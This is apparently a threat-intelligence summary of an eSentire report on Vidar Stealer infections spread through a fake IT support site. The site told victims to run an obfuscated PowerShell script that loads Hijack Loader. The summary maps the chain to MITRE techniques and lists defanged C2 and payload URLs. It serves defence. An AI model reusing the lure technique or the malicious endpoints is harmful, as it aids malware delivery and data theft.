eSentire’s TRU team tracked a Vidar Stealer infection that began via a fake IT support site after a user searched for Windows Update Error solutions. The attack chain uses an obfuscated PowerShell script to download and execute payload (Hijack Loader/IDAT Loader) and communicates with its C2 via POST requests; a YouTube video with bot-generated comments promotes the scam. #Vidar #PCHelperWizards #HijackLoader #IDATLoader #PowerShell #WindowsUpdateError #YouTube
Keypoints
- In June 2024, TRU observed a Vidar Stealer infection initiated via a fake IT support website after a Windows Update Error search.
- The site PCHelper Wizards provided an obfuscated PowerShell script with instructions to run PowerShell as Administrator.
- The script decodes Base64 content to fetch payload URLs (first stage) and downloads a ZIP to the Temp folder, followed by POST requests to a C2.
- If executed, the payload reveals additional Base64 content and notifies the C2 of success, using the Hijack Loader (IDAT Loader) variant that uses netsh.exe for process injection.
- A YouTube video with bot-generated comments promotes the malicious site and links to the step-by-step PowerShell instructions.
- TRU’s recommendations emphasize monitoring PowerShell and administrative tools, user education, and caution with online solutions to common IT issues.
MITRE Techniques
- [T1189] Drive-by Compromise – Initial access via a fake IT support site luring victims into executing a malicious PowerShell script. [ “The infection began when the victim performed a web search for solutions to a Windows Update Error code.” ]
- [T1059.001] PowerShell – The attacker uses an obfuscated PowerShell script to download and execute payload. [ “The user can copy the code from the website or download and execute it.” ]
- [T1027] Obfuscated/Compressed Files and Information – The script uses an obfuscated PowerShell payload. [ “an obfuscated PowerShell script” ]
- [T1055] Process Injection – The Hijack Loader variant uses netsh.exe for process injection. [ “uses netsh.exe for process injection” ]
- [T1071] Application Layer Protocol – The script reports back to C2 via POST requests during and after payload execution. [ “make a POST request, likely reporting back to the C2 that the download stage has been completed successfully.” ]
- [T1566.001] Phishing: Spearphishing Link – YouTube bot-promoted video promotes the malicious site and links to the PowerShell instructions. [ “a YouTube video containing comments from bots falsely claiming the solution was effective and boasting the validity of the solution.” ]
Indicators of Compromise
- [URL] C2 / payload download endpoints – hxxps://ghufal.answermedia[.]site/KB/KB66958646, hxxps://ghufal.answermedia[.]site/KB/post.php?status=2
Read more: https://www.esentire.com/blog/fake-it-support-website-leading-to-vidar-infection